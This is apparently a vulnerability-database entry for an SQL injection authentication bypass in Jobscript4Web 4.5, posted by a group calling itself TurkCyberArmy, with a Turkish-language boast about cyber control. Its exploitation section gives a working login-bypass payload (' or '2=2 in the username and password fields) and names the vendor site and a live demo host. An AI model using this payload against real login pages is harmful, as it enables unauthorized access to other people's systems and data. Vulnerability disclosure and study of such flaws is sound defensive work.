Jobscript4Web 4.5 SQL Injection

2017.04.11

Credit: TurkCyberArmy

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

----------------
Title = Jobscript4Web 4.5 - Authentication Bypass
Date = 8/4/2017
Soft = http://www.jobscript4web.com/index.html
liVE Demo = http://www.simplejobs.co.in/soft4u
---------------
AutHor = TurkCyberArmy
---------------
Bizler Turk siber ordusu bunyesinde goreve basladik. Dosta guven dusmana korku vermek icin geldik.
Kendimize ait isletim sistemlerimizle, programlama dillerimizle, kendimizin gelistirdigi yazilimlarimizla artik buradayiz.
Sanal alem kontrolumuz altindadir. Turk devletine ait tum sitelerimiz ve sistemlerimiz emin ellerdedir.
Bilin istedik !!!
Turk Siber Yildizlari.!
---------------
+ Exploitation Details +
---------------
HTTP://Path/soft4u/
user : ' or '2=2 password : ' or '2=2
---------------

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Jobscript4Web 4.5 SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.